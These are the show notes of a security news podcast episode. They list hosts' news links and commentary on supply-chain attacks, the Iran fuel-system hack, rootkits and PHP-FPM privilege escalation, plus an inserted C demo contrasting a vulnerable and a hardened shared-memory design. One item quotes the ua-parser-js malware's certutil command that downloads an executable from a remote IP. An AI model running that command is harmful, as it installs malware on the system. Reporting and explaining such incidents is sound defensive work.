Iranian Gas, Smelly Towns, View Source Legality, EBCDIC & GDPR, & Unlocking Oculus Go – PSW #716
This week in the Security News we talk: It's still not illegal to look at HTML source code, Nobelium strikes again, npm infections, gas is cheap in Iran, if you can get it, Google Tensor, going beyond the transport layer with HTTPS, buying a power plant, EBCDIC and GDPR, how children can infect parents, signing your rootkit, dates are hard, something smells funny and bird poop in your antenna, & more!
Announcements
Don't forget to check out our library of on-demand webcasts & technical trainings at securityweekly.com/ondemand.
Hosts
Paul Asadoorian
Principal Security Evangelist at Eclypsium
- 1. FBI Raids Chinese Point-of-Sale Giant PAX Technology – Krebs on Security
- 2. Apple Patches Critical iOS Bugs; One Might Be Under Attack
- 3. Squirrel Bug Lets Attackers Execute Code in Games, Cloud Services
- 4. How hackers hijacked thousands of high-profile YouTube accounts
- 5. SALAD SHOOTER: June 1963: Discovery of the Cosmic Microwave Background - "Take the case of Bell Labs physicists Arno Penzias and Robert Wilson, who set out to map radio signals from the Milky Way and wound up being the first to measure the cosmic background radiation (CMB). Their momentous discovery made it possible to obtain information about cosmic processes that took place about 14 billion years ago, and forever changed the science of cosmology, transforming it from a specialty of a select few astronomers to a "respectable" branch of physics almost overnight." All stemmed from me watching this video, as part of my son's homework! https://www.youtube.com/watch?v=hcds5Ob59Dg - Also interesting is that they started to look into interference for some of the first satellite phones. They cleaned bird poop out of the antenna as a potential source of interference. 1% of the static on your TV with an antenna, if you tune in between the channels, comes from residual big bang microwave radiation.
- 6. 70% of WiFi Network Samples Cracked in a WiFi Network Cracking Experiment
- 7. Pixel 6: Setting a new standard for mobile security - I can't wait: "The Google Tensor security core is a custom designed security subsystem dedicated to the preservation of user privacy. It's distinct from the application processor, not only logically, but physically, and consists of a dedicated CPU, ROM, one-time-programmable (OTP) memory, crypto engine, internal SRAM, and protected DRAM. For Pixel 6 and 6 Pro, the security core's primary use cases include protecting user data keys at runtime, hardening secure boot, and interfacing with Titan M2™."
- 8. Why I think all budding ethical hackers should take CS50x or learn some bit of Computer Science.
- 9. HTTPS Attestable (HTTPA) Protocol – Enhancing HTTPS Security - I really think of HTTPS as protecting the transport layer, however, Intel is proposing extending it as: "HTTPS cannot provide security assurances on the request data in compute, so the computing environment remains uncertain risks and vulnerabilities."
- 10. Malicious Firefox Add-ons Block Browser From Downloading Security Updates - We need some further restrictions on what add-ons can do: "The two extensions in question, named Bypass and Bypass XM, interfered with Firefox in a way that prevented users who had installed them from downloading updates, accessing updated blocklists, and updating remotely configured content."
- 11. SolarWinds hackers, Nobelium, once again strike global IT supply chains, Microsoft warns
- 12. North Korea Linked Lazarus APT Now Targets the IT supply chain. – CyberWorkx
- 13. Iranian gas stations out of service after distribution network hacked - First, like wow: "According to media reports, the “cyberattack 64411” message appeared to customers that tried to get subsidized fuel at 5 cents a liter or 20 cents a gallon using government-issued cards." Also, a coordinated attack: "As news spread about the NIOPDC distribution network being under attack, digital billboards in multiple cities in Iran started to show messages reading “Khamenei! Where's our fuel?” and “Free fuel in Jamaran station.”" And this LOL: "Iranian state television confirmed the reports of a cyberattack hitting gas stations and Iran's Supreme Council of Cyberspace believes the incident is state-sponsored, although it is early to say which country is behind it." - Gee, I wonder who?
- 14. Azure AD Default Configuration Blunders
- 15. Bitcoin-mining power plant raises ire of environmentalists - "Greenidge Generation runs a once-mothballed plant near the shore of Seneca Lake in the Finger Lakes region to produce about 44 megawatts to run 15,300 computer servers, plus additional electricity it sends into the state's power grid. The megawatts dedicated to Bitcoin might be enough electricity to power more than 35,000 homes."
- 16. EBCDIC is incompatible with GDPR - So, the bank could not spell a customer's name correctly, due to diacritical marks. The customer filed a GDPR complaint under Article 16 ("The data subject shall have the right to obtain from the controller without undue delay the rectification of inaccurate personal data concerning him or her."). The bank says this is impossible because, get this, the system they use only supports EBCDIC!
- 17. PHP-FPM local root vulnerability - This, THIS is why I hate parent processes running as root and child processes running with lower privileges: "A low-privilege process can read and write an array of pointers used by the main process, running as root, through shared memory. An attacker can leverage this problem to change a 32-bit integer from zero to one in the main process's memory, or clear a memory region. By leveraging the primitive multiple times, it is possible to reach another bug, make the main process execute code, and thus escalate privileges."
- 18. Breaking the News: New York Times Journalist Ben Hubbard Hacked with Pegasus after Reporting on Previous Hacking Attempts – The Citizen Lab
- 19. Security issue: compromised npm packages of ua-parser-js (0.7.29, 0.8.0, 1.0.0) – Questions about deprecated npm package ua-parser-js · Issue #536 · faisalman/ua-parser-js - Yikes: "certutil -urlcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe"
- 20. Digitally-Signed Rootkits are Back – A Look at FiveSys and Companions - I really want to know how this works: "For the past few months, Bitdefender researchers have seen a surge in malicious drivers with valid digital signatures issued through the WHQL signing process. This research focuses on FiveSys – a digitally signed rootkit that made its way through the driver certification process." - The whitepaper does not really say, unless I missed it, how the attackers managed this: "The reason for this might be the new Driver Signing requirements from Microsoft, which demand drivers to be digitally signed by Microsoft before acceptance by the operating system. This new requirement ensures that all drivers are validated and signed by the operating system vendor rather than the original developer and, as such, digital signatures offer no indication as to the identity of the real developer. It seems that malware writers managed to work around the new requirements, as Netfilter and new FiveSys demonstrated."
- 21. CISA warns of GPS bug that may roll back dates by 1,024 weeks, to March 2002 - Coding dates and time is hard: https://gitlab.com/gpsd/gpsd/-/issues/144 - Looks like in accounting for leap year they created a time machine: "trigger a 1024 week backward time jump from Saturday October 16, 2021 to Sunday March 3, 2002".
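The PHP-FPM item (17) above hinges on a root master process and a lower-privileged worker sharing a table of pointers. The C program below is an added illustration written for these notes; it is not PHP-FPM's code and does not reproduce the actual bug. It simulates a fork()ed worker that has been compromised and overwrites one entry of a MAP_SHARED pointer table, so that the parent's own "set this value to 1" routine writes into memory the worker chose (here a hypothetical `g_is_admin` integer, standing in for the 32-bit zero-to-one flip in the quote). The hardened variant keeps the pointer table private to the parent and passes only bounds-checked indices through shared memory. The worker's privilege drop (setuid) is omitted, since the address-space layout, not the uid, is what makes the pointer forgeable.

```c
/* Added example for PSW #716 show notes: not PHP-FPM source code.
 * Demonstrates why a privileged parent must never trust pointers that a
 * lower-privileged child can write through shared memory. */
#define _DEFAULT_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>

#define NSLOTS 4

/* Vulnerable layout: a table of pointers into the parent's private memory,
 * placed in a region that is MAP_SHARED with the worker. */
struct shared_vuln {
    int32_t *slot[NSLOTS];
};

/* Hardened layout: shared memory carries only small integers; the pointer
 * table itself stays in the parent's private memory. */
struct shared_safe {
    uint32_t idx[NSLOTS];
};

/* Hypothetical privileged state. After fork() each process has its own copy,
 * but at the SAME virtual address, which is what the attack relies on. */
static int32_t g_is_admin = 0;
static int32_t g_counters[NSLOTS];

static void *map_shared(size_t len)
{
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
                   MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    return p == MAP_FAILED ? NULL : p;
}

/* Returns the parent's g_is_admin after the worker tampered with the table.
 * 1 means the worker steered a privileged write onto a value of its choosing. */
int demo_vulnerable(void)
{
    struct shared_vuln *sh = map_shared(sizeof *sh);
    if (!sh) return -1;
    for (int i = 0; i < NSLOTS; i++) sh->slot[i] = &g_counters[i];
    g_is_admin = 0;

    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* Compromised worker: &g_is_admin here equals the parent's address
         * of g_is_admin, so the forged pointer is valid in the parent. */
        sh->slot[0] = &g_is_admin;
        _exit(0);
    }
    waitpid(pid, NULL, 0);

    /* Parent's legitimate routine: "increment slot 0" with no validation. */
    *sh->slot[0] = 1;

    int32_t result = g_is_admin;
    munmap(sh, sizeof *sh);
    return result;
}

/* Same scenario, but the worker can only supply an index, which the parent
 * bounds-checks before resolving it against its private pointer table. */
int demo_hardened(void)
{
    struct shared_safe *sh = map_shared(sizeof *sh);
    if (!sh) return -1;
    int32_t *table[NSLOTS];             /* private to the parent */
    for (int i = 0; i < NSLOTS; i++) {
        table[i] = &g_counters[i];
        sh->idx[i] = (uint32_t)i;
    }
    g_is_admin = 0;

    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* Worker can poison the index but cannot name a parent address. */
        sh->idx[0] = 0xFFFFFFFFu;
        _exit(0);
    }
    waitpid(pid, NULL, 0);

    uint32_t i = sh->idx[0];            /* read once, then validate */
    if (i < NSLOTS) *table[i] = 1;      /* out-of-range request is dropped */

    int32_t result = g_is_admin;
    munmap(sh, sizeof *sh);
    return result;
}

int main(void)
{
    printf("vulnerable: g_is_admin = %d\n", demo_vulnerable());  /* 1 */
    printf("hardened:   g_is_admin = %d\n", demo_hardened());    /* 0 */
    return 0;
}
```

Build with `cc -Wall -o shm_demo shm_demo.c` (assumed filename) on Linux or another POSIX system and run it. The design point is that the shared region must carry data the privileged side can validate (indices, lengths, opaque handles), never addresses it will dereference.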
Jeff Man
Sr. InfoSec Consultant at Online Business Systems
Larry Pesce
Product Security Research and Analysis Director at Finite State
- 1. Add Mycelium To Your Mesh Networks
- 2. FBI Releases Indicators of Compromise Associated with Ranzy Locker Ransomware
- 3. Cracking WiFi at Scale with One Simple Trick
- 4. Unlocking Oculus Go
- 5. Copyleft Compliance Projects – Software Freedom Conservancy
- 6. SS7 Attack Panel: Yet Another Rising SCAM on Social Media
- 7. California town? This could be the studio…SQUIRREL! I love this industry... it is the only one I know of where you can mention snort, vomit and burp and not be talking about a bodily function.
Lee Neely
Senior Cyber Advisor at Lawrence Livermore National Laboratory
- 1. Viewing website HTML code is not illegal or “hacking,” prof. tells Missouri gov. - The cybersecurity professor who helped uncover the Missouri government's failure to protect teachers' Social Security numbers has demanded that the state cease its investigation into him and stop making "baseless accusations" that he committed a crime. Khan hired an attorney to defend himself against the state's accusations. On Thursday last week, Khan's attorney sent a litigation hold and demand letter to Parson and several state agencies. The letter says that Parson and other state officials defamed Khan and violated his First Amendment "right to speak freely without the threat of government retaliation." The letter adds the Show Me State's investigation into Khan "would violate the prohibition on malicious prosecution." "Professor Khan is likely to prevail on the merits of any case brought against him," the letter said. "No statute in Missouri or on the federal level prohibits members of the general public from viewing publicly available websites or viewing the website's unencrypted source code. No reasonable person would think they were unauthorized to view a publicly available website, its unencrypted source code, or any of the unencrypted translations of that source code. There is no probable cause to investigate Professor Khan, and instigation or continuation of any proceeding against him would therefore be prohibited."
- 2. SolarWinds hackers, Nobelium, once again strike global IT supply chains, Microsoft warns - Microsoft has issued a warning to organizations that the "Nobelium" hacking group behind the SolarWinds attacks has targeted some 140 technology service providers and resellers as part of a global IT supply chain attack.
- 3. Another popular npm package infected with malware - In an audacious incident, threat actors hijacked the account of the developer of a widely used JavaScript library, UAParser.js, and replaced the legitimate code with a malicious version carrying a cryptominer and a credential-stealing trojan.
- 4. TodayZoo phishing kit borrows the code from other kits - Researchers say they have discovered a series of credential phishing campaigns in which hackers are leveraging a phishing kit dubbed "TodayZoo" that uses large portions of code lifted from various other phishing kits in order to steal credentials. According to Microsoft, TodayZoo was first identified in December 2020 and includes portions of code such as comment markers, dead links, and other elements found in other, previous phishing kits.
- 5. Groove ransomware calls on all extortion gangs to attack US interests - The Groove ransomware gang is calling on other extortion groups to attack US interests after law enforcement took down REvil's infrastructure last week. Over the weekend, BleepingComputer reported that the REvil ransomware operation shut down again after an unknown third party hijacked their dark web domains.
- 6. Iran says cyberattack closes gas stations across country - A cyberattack crippled gas stations across Iran on Tuesday, leaving angry motorists stranded in long lines. No group immediately claimed responsibility for the attack, which rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump.
- 7. Unknown ransomware gang uses SQL injection bug in BillQuick Web Suite to deploy ransomware - An unknown ransomware gang is exploiting a critical SQL injection flaw, tracked as CVE-2021-42258, in the BillQuick Web Suite time and billing solution to deploy ransomware.
Tyler Robinson
Director of Offensive Security & Research at Trimarc Security, Founder & CEO at Dark Element